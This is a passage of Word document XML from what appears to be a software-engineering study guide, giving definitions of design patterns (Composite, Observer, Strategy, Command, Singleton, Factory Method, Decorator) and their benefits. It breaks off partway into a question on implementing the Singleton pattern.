        <w:t>: Composes objects into tree structures to represent part-whole hierarchies, allowing clients to treat individual objects and compositions uniformly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038E1E56" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Behavioral Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E79B8" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="491"/>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Deal with object interaction and responsibility, focusing on communication between objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580075B0" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AFC5DE" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observer</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified and updated automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646A2D4" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines a family of algorithms, encapsulates each one, and makes them interchangeable, allowing the algorithm to vary independently from clients that use it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE155F0" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Encapsulates a request as an object, thereby allowing users to parameterize clients with queues, requests, and operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AAB780"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Importance of Design Patterns in Software Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E5EC7" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reusability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696B164" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Design patterns provide general solutions that can be reused in different situations, reducing the need to solve the same problem multiple times. This reuse leads to more efficient development processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E200C8A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Maintainability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DECD0" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>By providing clear, well-defined solutions, design patterns make the codebase easier to understand, modify, and extend. Patterns help in organizing code in a way that it can be easily maintained and adapted to new requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2C9DE" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC72F79" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Design patterns offer a common vocabulary for developers. When design patterns are used, developers can communicate complex ideas more effectively using pattern names (e.g., "Use the Observer pattern here") rather than explaining the entire solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00752F65" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7E1AD" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Patterns encapsulate best practices and principles that have been tested over time. By using design patterns, developers can avoid common pitfalls and build software that is more robust and flexible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589753B" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05630D13" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementing design patterns leads to more consistent code across a project or organization, as developers follow the same approaches to solving similar problems. This consistency is particularly beneficial in large teams or projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F94950" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flexibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E551F" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Design patterns promote flexible design, allowing the system to be easily extended or modified without significant changes to the existing codebase. This is achieved by adhering to principles like the Open/Closed Principle and Dependency Inversion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02945A56"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Examples of Commonly Used Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A4114" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Singleton Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures that a class has only one instance and provides a global point of access to it. Commonly used for managing shared resources like configuration settings or a database connection pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F59B5" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Factory Method Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides an interface for creating objects but allows subclasses to alter the type of objects that will be created. Useful in scenarios where the exact type of object isn’t known until runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA16380" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observer Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Establishes a one-to-many dependency between objects, allowing multiple observers to be notified when the state of a subject changes. This pattern is widely used in event-driven systems, like user interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7372EAF5" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decorator Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Allows behavior to be added to individual objects, dynamically, without affecting the behavior of other objects from the same class. This is commonly used to extend the functionalities of objects in a flexible and reusable manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D222CD4" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1A22B0" w14:textId="1C8BAA1B" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc178383332"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Describe the Singleton pattern.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="6A5B035D" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Singleton pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a creational design pattern that ensures a class has only one instance and provides a global point of access to that instance. This pattern is particularly useful when exactly one object is needed to coordinate actions across a system, such as managing shared resources, configuration settings, or logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409CF60E"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Key Concepts of the Singleton Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609846CF" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Singleton pattern restricts the instantiation of a class to a single object. This ensures that there is only one instance of the class throughout the application, preventing multiple instances that could lead to inconsistent states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1573A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global Access Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Singleton provides a global access point to the instance. This means that the same instance of the class is accessible from anywhere in the application, ensuring consistent behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC38B7"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Implementation of the Singleton Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A78ACDB" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The Singleton pattern is implemented by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C2873" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
